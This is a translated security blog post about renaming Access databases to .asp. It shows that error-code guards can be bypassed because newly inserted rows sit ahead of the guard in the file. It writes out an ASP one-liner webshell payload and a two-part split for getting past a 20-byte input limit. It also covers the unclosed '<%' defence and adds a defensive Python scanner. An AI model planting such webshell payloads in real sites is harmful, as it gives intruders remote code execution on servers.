The Disasters Caused by Changing mdb to asp


Author: lake2 Source: http://blog.csdn.net/lake2/

Renaming mdb-format databases to asp/asa to prevent downloading seems to be popular at present, but much of the time it does not work. Accessing the database through a browser returns garbled characters, but the database can be fetched easily with the Internet Express (FlashGet) download manager. Downloading the database is only the surface of the problem, however: intruders can also use this asp database to get a webshell. If this is unfamiliar, we suggest you first read "the disaster caused by mdb modification to asp".

Worried? Can mdb still be changed to asp? The answer is yes; we should not give up eating for fear of choking. The earlier article ends by saying: "... Illegal asp code such as <%='a'-1%> is added to the database to completely prevent the database from being downloaded. Because of the illegal asp code, after inserting our webshell code and running it, it will only display the error of the previous illegal code, rather than executing our shell code ......". There are also articles on the Internet that say to create a table in the database and enter an incorrect piece of asp code (for example, "<% asd %>") as its content; an error then occurs when the asp database is accessed, and it cannot be downloaded with Internet Express.

Really? In fact, asp is interpreted as it executes. If the shell we insert is executed before the error code ...... Let's run a test first.

Create an Access database in the web directory, add tables, fields, and content at will, change the suffix to asp, and access the database through a browser. Garbled characters are displayed. Now add the content "<% lake2 %>" to a field in the table and access it again. An error occurs! See figure 1.

Next, add the content "<%execute(request("lake2"))%>" to the same table (simulating webshell insertion), and access the asp database again. An error still occurs. See figure 2, and compare the error message with figure 1.

Notice the difference? The second error, "Type Mismatch: execute", is the error raised when the execute function's parameter is null, whereas the first is an error because the string "lake2" does not conform to asp syntax. This shows that the webshell we inserted later is executed before the earlier error code. You can open the database in UltraEdit and check the locations of "<%execute(request("lake2"))%>" and "<% lake2 %>".

So now we can conclude that, within the same table of an Access database, the physical location of new data is always before the old data.

This can be used to get around some limitations. For example, suppose the server limits input data to 20 bytes. How can shell code be injected? It can be written as two statements: "<%Y=request("x")%>" and "<%execute(Y)%>". Work out the order yourself.

Usually the error code is inserted by creating a new table. What happens in the new-table case?

Try it yourself. My conclusion is that the content of a newly created table is physically located after the old tables. In other words, error code inserted by creating a new table actually sits after the content of the other fields in the database. We can submit the shell code to the database and get a webshell!

The solution to the above problem is also simple: make sure your error code is located in the database before the content of the other fields. However, this seems unrealistic, because it requires you to create the anti-download table first ...... Well, we can borrow the approach used by Dynamic Network (Dvbbs).

There is a table named Dv_notdownload in the Dynamic Network database. Its field type is "OLE object", and the data in it is long binary data. As the name suggests, it is used to prevent downloading.

During testing, I found that even if a shell is inserted into a table created earlier than Dv_notdownload, it cannot be executed. What happened to the conclusion above? Later, I learned that the content of the table is "<%". The asp file reports an error first because the closing "%>" is missing, and does not execute any statement at all (the cases discussed above were all complete statements). Well, now you know what to do :p
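
A defender's check for the behaviour described above, as an added example that is not part of the original article: it scans the raw bytes of a database renamed to .asp for script delimiters and reports whether an unclosed "<%" guard is present. It assumes the ASP parser pairs each "<%" with the next "%>" in the file; the sample bytes and the name inserted_later are constructed.

```python
# Added example: audit a renamed Access database for ASP script delimiters.
# Assumption: the ASP parser pairs each "<%" with the next "%>" in raw file bytes.
OPEN, CLOSE = b"<%", b"%>"


def scan_asp_blocks(data: bytes):
    """Return (complete_blocks, unterminated_offset).

    complete_blocks is a list of (offset, block_bytes) in file order;
    unterminated_offset is the offset of a "<%" with no "%>" after it, or None.
    """
    blocks, pos = [], 0
    while True:
        start = data.find(OPEN, pos)
        if start == -1:
            return blocks, None
        end = data.find(CLOSE, start + len(OPEN))
        if end == -1:
            return blocks, start
        blocks.append((start, data[start:end + len(CLOSE)]))
        pos = end + len(CLOSE)


def audit(data: bytes) -> str:
    blocks, unterminated = scan_asp_blocks(data)
    if unterminated is not None:
        return "guarded"          # article: missing "%>" errors first, nothing runs
    if blocks:
        return "order-dependent"  # complete blocks are processed in file order
    return "no-script"            # served as garbled bytes, so it can be downloaded


# Constructed samples (not real database files): filler bytes stand in for pages.
FILLER = b"\x00\x01\x02" * 8
NEW_TABLE_GUARD = FILLER + b"<% inserted_later %>" + FILLER + b"<% asd %>" + FILLER
UNCLOSED_GUARD = FILLER + b"<% inserted_later %>" + FILLER + b"<%" + FILLER
PLAIN = FILLER * 3

if __name__ == "__main__":
    for name, sample in [("new-table guard", NEW_TABLE_GUARD),
                         ("unclosed guard", UNCLOSED_GUARD),
                         ("plain", PLAIN)]:
        blocks, _ = scan_asp_blocks(sample)
        first = blocks[0][1].decode("latin-1") if blocks else "-"
        print(f"{name:16} verdict={audit(sample):16} first block={first}")
```

A verdict of "order-dependent" means the error-code table offers no protection by itself, because whichever complete block sits first in the file is reached first.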
